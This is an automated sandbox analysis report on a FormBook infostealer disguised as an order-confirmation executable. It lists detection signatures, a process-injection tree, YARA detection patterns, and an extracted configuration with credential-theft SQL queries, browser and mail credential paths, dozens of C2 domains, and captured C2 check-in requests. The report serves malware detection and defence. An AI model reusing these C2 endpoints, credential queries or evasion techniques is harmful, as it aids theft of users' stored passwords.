Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report Order confirmation 64236000000025 26.01.2021.exe

Overview

General Information

Sample Name:Order confirmation 64236000000025 26.01.2021.exe
Analysis ID:344999
MD5:b18e939428b3ffc67c750e2a0988d61a
SHA1:405cc59b2da9a6187bd65e7c2fa4f9ebdae32111
SHA256:238dd9cb9b1c235e2babbc3f3b1372da8d76e4d94a4440776814957e0fd09f0b
Tags:AdwareGenericexe

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Uses netstat to query active network connections and open ports
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
PE file contains strange resources
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • Order confirmation 64236000000025 26.01.2021.exe (PID: 4588 cmdline: 'C:\Users\user\Desktop\Order confirmation 64236000000025 26.01.2021.exe' MD5: B18E939428B3FFC67C750E2A0988D61A)
    • lqqebhptsg.exe (PID: 5064 cmdline: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe C:\Users\user\AppData\Local\Temp\Nla\kwalgxu.u MD5: C56B5F0201A3B3DE53E561FE76912BFD)
      • 9rd1hxro.exe (PID: 5732 cmdline: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe C:\Users\user\AppData\Local\Temp\Nla\kwalgxu.u MD5: 535DD1329AEF11BF4654B3270F026D5B)
        • explorer.exe (PID: 3472 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • NETSTAT.EXE (PID: 1284 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)
            • cmd.exe (PID: 6352 cmdline: /c del 'C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
              • conhost.exe (PID: 6360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"Config: ": ["CONFIG_PATTERNS 0x87dc", "KEY1_OFFSET 0x1c8bf", "CONFIG SIZE : 0xc7", "CONFIG OFFSET 0x1c991", "URL SIZE : 25", "searching string pattern", "strings_offset 0x1b493", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0x404e269a", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70a3", "0x9f715036", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad01a6da", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd01451", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0xc72ce2d5", "0x263178b", "0x57585356", "0x9cb95240", "0xcc39fef", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xc30c49a6", "0xcb591d7f", "0x5c4ee455", "0x7c81c71d", "0x11c6f95e", "--------------------------------------------------", "Decrypted Strings", "--------------------------------------------------", "USERNAME", "LOCALAPPDATA", "USERPROFILE", "APPDATA", "TEMP", "ProgramFiles", "CommonProgramFiles", "ALLUSERSPROFILE", "/c copy \"", "/c del \"", "\\Run", "\\Policies", "\\Explorer", "\\Registry\\User", "\\Registry\\Machine", "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", "Office\\15.0\\Outlook\\Profiles\\Outlook\\", " NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\", "\\SOFTWARE\\Mozilla\\Mozilla ", "\\Mozilla", "Username: ", "Password: ", "formSubmitURL", "usernameField", "encryptedUsername", "encryptedPassword", "\\logins.json", "\\signons.sqlite", "\\Mail\\", "\\Foxmail", "\\Storage\\", "\\Accounts\\Account.rec0", "\\Data\\AccCfg\\Accounts.tdat", "\\Microsoft\\Vault\\", "SELECT encryptedUsername, encryptedPassword, formSubmitURL FROM moz_logins", "\\Google\\Chrome\\User Data\\Default\\Login Data", "SELECT origin_url, username_value, password_value FROM logins", ".exe", ".com", ".scr", ".pif", ".cmd", ".bat", "ms", "win", "gdi", "mfc", "vga", "igfx", "user", "help", "config", "update", "regsvc", "chkdsk", "systray", "audiodg", "certmgr", "autochk", "taskhost", "colorcpl", "services", "IconCache", "ThumbCache", "Cookies", "SeDebugPrivilege", "SeShutdownPrivilege", "\\BaseNamedObjects", "config.php", "POST ", " HTTP/1.1", "", "Host: ", "", "Connection: close", "", "Content-Length: ", "", "Cache-Control: no-cache", "", "Origin: http://", "", "User-Agent: Mozilla Firefox/4.0", "", "Content-Type: application/x-www-form-urlencoded", "", "Accept: */*", "", "Referer: http://", "", "Accept-Language: en-US", "", "Accept-Encoding: gzip, deflate", "", "dat=", "f-start", "amgggma.com", "reptilerus.com", "degearboss.com", "jennaelsbakeshop.com", "invisablescreen.com", "beingsingleda.com", "2nsupplements.online", "12862.xyz", "expand.care", "romeoalchimistefullmental.com", "7750166.com", "brendonellis.com", "sprayfoamharlemny.com", "bukannyaterbuai30.com", "boatpiz.com", "stylistrx.com", "decorationhaven.com", "stockaro.com", "state728.com", "secretlairtoys.com", "davenportnsons.com", "gofetchable.com", "xn--vhqqb859bnjqul4b7fg.com", "jsmcareers.com", "czb878.com", "reformadventist.com", "nishagile.com", "rotalablog.com", "beachesvr.com", "ekpays.com", "triphousestudio.com", "kusytekrealities.com", "madhabicorp.com", "husum-ferienwohnungen.com", "mitbss.com", "farmersly.com", "appcaoya.com", "ninjawhatsapp.club", "creuatrue.com", "watsonmedi.com", "purposelyproductivelab.com", "alliswell.info", "narichan01.com", "racevx.xyz", "swiftappliancessc.com", "aiguapea.com", "xn--kok-j59d107t.net", "informaprofiles.com", "denetimlitakip.net", "xtremesupplies.com", "motion-mill-tv.com", "thealtxmvmt.com", "sexeighty.com", "kiiteblog.com", "aoey.ink", "tiendastags.com", "politicalrefs.com", "lifeinsuranceyourway.com", "rozellrealtynj.com", "newsparika.com", "kettel.net", "taxandbookkeepingsolutions.com", "fashiongraphia.com", "coredigit.net", "f-end", "--------------------------------------------------", "Decrypted CnC URL", "--------------------------------------------------", "www.dmvantalya.com/bnuw/\u0000"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.256150994.0000000004DC0000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000001.00000002.256150994.0000000004DC0000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000001.00000002.256150994.0000000004DC0000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166a9:$sqlite3step: 68 34 1C 7B E1
    • 0x167bc:$sqlite3step: 68 34 1C 7B E1
    • 0x166d8:$sqlite3text: 68 38 2A 90 C5
    • 0x167fd:$sqlite3text: 68 38 2A 90 C5
    • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
    0000000C.00000002.625191007.0000000000640000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      0000000C.00000002.625191007.0000000000640000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 16 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      1.2.lqqebhptsg.exe.4dc0000.1.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        1.2.lqqebhptsg.exe.4dc0000.1.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        1.2.lqqebhptsg.exe.4dc0000.1.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x158a9:$sqlite3step: 68 34 1C 7B E1
        • 0x159bc:$sqlite3step: 68 34 1C 7B E1
        • 0x158d8:$sqlite3text: 68 38 2A 90 C5
        • 0x159fd:$sqlite3text: 68 38 2A 90 C5
        • 0x158eb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a13:$sqlite3blob: 68 53 D8 7F 8C
        2.2.9rd1hxro.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          2.2.9rd1hxro.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 2.2.9rd1hxro.exe.400000.0.raw.unpackMalware Configuration Extractor: FormBook {"Config: ": ["CONFIG_PATTERNS 0x87dc", "KEY1_OFFSET 0x1c8bf", "CONFIG SIZE : 0xc7", "CONFIG OFFSET 0x1c991", "URL SIZE : 25", "searching string pattern", "strings_offset 0x1b493", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0x404e269a", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70a3", "0x9f715036", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad01a6da", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd01451", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0xc72ce2d5", "0x263178b", "0x57585356", "0x9cb95240", "0xcc39fef", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xc30c49a6", "0xcb591d7f", "0x5c4ee455", "0x7c81c71d", "0x11c6f95e", "----------------------------
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeReversingLabs: Detection: 20%
          Multi AV Scanner detection for submitted fileShow sources
          Source: Order confirmation 64236000000025 26.01.2021.exeReversingLabs: Detection: 50%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000002.256150994.0000000004DC0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.625191007.0000000000640000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.626416806.00000000032D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.291015607.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.291095768.00000000004B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.250721725.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.291143508.00000000008E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.lqqebhptsg.exe.4dc0000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.9rd1hxro.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.9rd1hxro.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.lqqebhptsg.exe.4dc0000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.9rd1hxro.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.9rd1hxro.exe.400000.0.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: Order confirmation 64236000000025 26.01.2021.exeJoe Sandbox ML: detected
          Source: 1.2.lqqebhptsg.exe.4dc0000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.2.9rd1hxro.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.1.9rd1hxro.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Compliance:

          barindex
          Uses 32bit PE filesShow sources
          Source: Order confirmation 64236000000025 26.01.2021.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Contains modern PE file flags such as dynamic base (ASLR) or NXShow sources
          Source: Order confirmation 64236000000025 26.01.2021.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Binary contains paths to debug symbolsShow sources
          Source: Binary string: wntdll.pdbUGP source: lqqebhptsg.exe, 00000001.00000003.248297924.0000000004FE0000.00000004.00000001.sdmp, 9rd1hxro.exe, 00000002.00000002.291392263.0000000000EFF000.00000040.00000001.sdmp, NETSTAT.EXE, 0000000C.00000002.626687203.000000000351F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: lqqebhptsg.exe, 00000001.00000003.248297924.0000000004FE0000.00000004.00000001.sdmp, 9rd1hxro.exe, NETSTAT.EXE, 0000000C.00000002.626687203.000000000351F000.00000040.00000001.sdmp
          Source: C:\Users\user\Desktop\Order confirmation 64236000000025 26.01.2021.exeCode function: 0_2_004059F0 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,
          Source: C:\Users\user\Desktop\Order confirmation 64236000000025 26.01.2021.exeCode function: 0_2_0040659C FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\Order confirmation 64236000000025 26.01.2021.exeCode function: 0_2_004027A1 FindFirstFileA,
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00B94005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00B9C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00B9494A GetFileAttributesW,FindFirstFileW,FindClose,
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00B9CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00B9CD14 FindFirstFileW,FindClose,
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00B9F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00B9F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00B9FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00B93CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 4x nop then pop esi
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4x nop then pop esi

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49736 -> 172.120.228.88:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49736 -> 172.120.228.88:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49736 -> 172.120.228.88:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49761 -> 172.120.228.88:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49761 -> 172.120.228.88:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49761 -> 172.120.228.88:80
          Uses netstat to query active network connections and open portsShow sources
          Source: unknownProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: global trafficHTTP traffic detected: GET /bnuw/?Mv0h=msgcY/GKR2+7Ty9qVKTu9pnyQy/WbDn9v8bhS9H73S6U4m0FMdY0GWjCttMprcSB8tfS&VPXh=GhIH HTTP/1.1Host: www.taxandbookkeepingsolutions.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bnuw/?Mv0h=ZkQWQs3u/Pcsc6Be2UsBBupV9psrlEYt+FgoIT3sSBI7ln8n9R9tp98wLB1cQ9m1FW6z&VPXh=GhIH HTTP/1.1Host: www.rotalablog.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bnuw/?Mv0h=9icL5DbtPB2as1Zd6Xg9EreNcG85hnBQd3Q23kTehbS+jnaTFoKfU18SI/G9uvH42aor&VPXh=GhIH HTTP/1.1Host: www.expand.careConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bnuw/?Mv0h=mq8FdBnXvVD55s8LjK9FZEvCV1OO/e8xkuyico0eSbMj5rSpqU8yGo4yf+6JoC4UpbW1&VPXh=GhIH HTTP/1.1Host: www.alliswell.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bnuw/?Mv0h=unzmywU5hP7O9pQ/VNJ9lipk3GER0gynknqK6ctL9m3B0ma88PcLaMbDy7KFiKVjmiKo&VPXh=GhIH HTTP/1.1Host: www.czb878.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
